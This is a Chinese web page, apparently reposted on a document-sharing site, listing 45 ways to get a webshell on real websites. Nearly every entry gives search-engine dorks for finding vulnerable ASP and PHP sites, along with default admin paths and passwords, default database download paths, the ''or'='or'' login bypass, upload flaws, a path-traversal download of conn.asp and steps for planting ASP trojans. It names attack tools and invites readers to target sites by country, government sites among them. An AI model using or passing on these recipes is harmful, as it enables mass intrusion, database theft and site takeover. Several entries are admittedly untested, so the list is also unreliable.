45种可以获得Webshell的程序

更新时间:2024-01-04 13:46:01 阅读量: 教育文库 文档下载

说明:文章内容仅供预览,部分内容可能不全。下载后的文档,内容与下面显示的完全一致。下载之前请确认下面内容是否您想要的,是否完整无缺。

45种可以获得Webshell的程序

1:到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2,到Google ,site:cq.cn inurl:asp

3, 利用挖掘鸡和一个ASP木马. 文件名是login.asp ......

路径组是/manage/ 关键词是went.asp 用'or'='or'来登陆

4,这个应该N多人都搞过吧 。。

关键字:Co Net MIB Ver 1.0网站后台管理系统

帐号密码为 'or'='or'

5.动感购物系统 呵呵。想到了明小子

inurl:help.asp登陆,如未注册成为会员!

upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这6。默认数据库地址blogdata/acblog.asa 关键字:acblog

7. 百度 /htdocs

注册里可以直接上传asa文件!

8. /Database/#newasp.mdb

关键词:NewAsp SiteManageSystem Version

9. 用挖掘机

关键字:Powered by WEBBOY 页面:/upfile.asp

10. baidu中搜索关键字Ver5.0 Build 0519 (存在上传漏洞)

11. Upfile_Article.asp bbs/upfile.asp 输入关键字:powered by mypower ,

应该是动什么上传漏洞来着?用的人也比较多 工具明小子 挖掘鸡就可以了

2漏洞

12. inurl:winnt\\system32\\inetsrv\\

在google里面输入这个就可以找到很多网站

13. 现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp

14. 关键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛

挖掘鸡的关键字 添 setup.asp

15. VBulletin论坛的数据库 默认数据库地址!

/includes/functions.php 工具:

1.网站猎手 下载地址:百度 Google! 2.Google 关键字:

Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一个就可以了 16

1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart open source。

这是一个商场系统。

2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统猜到,comersus.mdb. 是数据库名 数据库都是放在database/ 后的, 所以database/comersus.mdb

comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。 那样把前一个''store/''除去,再加上database/comersus.mdb 试试 都是默认数据库地址

17.无忧传奇官方站点程序。

1、后台管理地址:http://您的域名/msmiradmin/ 或者是 http://您的域名/admin.asp 2、默认后台管理帐号:msmir

3、默认后台管理密码:msmirmsmir 或 msmir

数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb 或者是 http://您的域名/msmirdata/msmirArticle.asa

~

数据库连接文件为 ***********/Conn.asp

也是默认数据库地址。 现在传奇4F好多都是这个。呵呵我刚还没事搞了个呢`

18. 百度里输入/skins/default/ 19.利用挖掘机

关键机:power by Discuz 路径:/wish.php 配合:

Discuz!论坛 wish.php远程包含漏洞 ......

20. 上传漏洞.

工具 : 当然还是明小子了 网站猎手 或者挖掘鸡了。 关键字powered by mypower

检测的页面或文件插入upfile_photo.asp 这个用的人也N多。。

21.新云漏洞

这个漏洞ACCESS和SQL版通吃。

Google搜索关键字 \关于本站 - 网站帮助 - 图 - 管理录\

把flash/downfile.asp?url=uploadfile/../../conn.asp以源码,软件等下载站居多。

大家时常碰到数据库如果前面或者中间+了# 可以用\\database\\#newasp.mdb

如:#xzws.mdb 改成#xzws.mdb

收集的。没试过。。。 - -!

22. 通吃所有商城+动力上传系统

使用工具:挖掘鸡 v1.1 明小子 商城入侵:

关键字:选购->加入购物车->去收银台->确认收货人信息支付或下单后汇款->汇款确认->发货->完成 漏洞页面:upload.asp upfile_flash.asp

还是上传漏洞拿webshell

23. 注射漏洞

- 下载声明 - 友情连接#替换就可以下载了->选付款方式-> - 网站地conn.asp ->在线广告合作提交到网站根目录。就可以下载 选配送方式百度搜索ioj's blog

24 动易 列目录

admin_articlerecyclebin.asp inurl:admin_articlerecyclebin.asp 25.

工具:网站猎手

关键词:inurl:Went.asp 后缀:manage/login.asp 口令:'or'='or'

这软件还不是太熟悉。 - - 26.

入侵魔兽私服

需要的工具:ASP木马 - -!废话了。 明小子

关键字:All Right Reserved Design:游戏联盟 后台地址:admin/login.asp

数据库的地址:chngame/#chngame.mdb

都默认的。数据库闹下来自己解密吧不多说了。 27.

漏洞是利用管理员iis设置的失误

用baidu 关键字就是比较罕见的脚本名 动网: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp

动易: admin_articlerecyclebin.asp

好像比较少吧不太清楚了这个。。 28.

国外站的爆库漏洞

关键字:sad Raven's Guestbook 密码地址:/passwd.dat 后台地址:/admin.php 29.

Discuz 4.1.0跨站漏洞 利用工具:1,WAP浏览器

2,WAP编码转换器

关键字:\

WAP浏览器..............................!! 30.

关键字:尚奈克斯

后台路径/system/manage.asp 直接传ASP木马

挖掘机去。。 - -! 31. 工具

1:网站猎手 2:大马

关键字:切勿关闭Cookies功能,否则您将不能登录插入diy.asp 32.

关键字:Team5 Studio All rights reserved 默认数据库:data/team.mdb

剩下的自己搞。不多说了 33.

工具: 挖掘机 辅臣数据库读取器

关键字: 企业简介 产品展示 产品列表后缀添加: /database/myszw.mdb 后台地址: admin/Login.asp

都默认的。一样。数据库闹下来自己解密码去 34.

关键子 XXX inurl:Nclass.asp ......

在\系统设置\里写个木马。 会被保存到 在 config.asp内。 35.

不进后台照样拿动网WEBSHELL

data.asp?action=BackupData 动网数据库备份默认路径

没试过。。。不知道。

- - 。就行了。。

36.

工具:网站猎手 WebShell 关键字:inurl:Went.asp 后缀:manage/login.asp 弱口令:'or'='or'

也没试过。 。。。。。。 37.

关键字owered byCDN_NEWS

随便扫遍文章加一个' ,来试探注入点 后台地址:admin_index.asp 用啥工具我就不说了吧。。。。。。。。。 38.

入侵雷池新闻发布系统 关键字:leichinews

去掉leichinews后面的.

打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp 再上传马.....

进访问uppic anran.asp 登陆马. ----

没试过。汗 ,收集来的。 39.

工具挖掘机就行了。

关键字ower System Of Article Management Ver 3.0 Build 20030628 默认数据库:database\\yiuwekdsodksldfslwifds.mdb 后台地址:自己扫描!

工具明小子。- -!怎么又是他啊。 MD5自己解.........

(NND这个一扫一大堆。大家可以去试试。。) 40.

一、通过GOOGLE搜索找大量注入点 关键字:asp?id=1 gov.jp/ asp?id= 页数:100

语言:想入侵哪个国家就填什么语言吧 42

关键字:Powered by:94KKBBS 2005 利用密码找回功能 找回admin 提问:ddddd 回答:ddddd 42.

关键字:inurl:Went.asp 后台为manage/login.asp

后台密码: 'or'=' 或者 'or''=''or' 登录 进入 默认数据库地址atabase/DataShop.mdb 43.

关键字:****** inurl:readnews.asp

把最后一个/改成\ ,直接暴库,看密码随便添加个新闻 在标题输入我们的一句话木马 44.

工具:一句话木马

BBsXp 5.0 sp1 管理员猜解器 关键词:powered by bbsxp5.00 进后台,备份一句话马! 45.

关键字:程序核心:BJXSHOP网上开店专家后台:/admin

,进后台

本文来源:https://www.bwwdw.com/article/5ubx.html

Top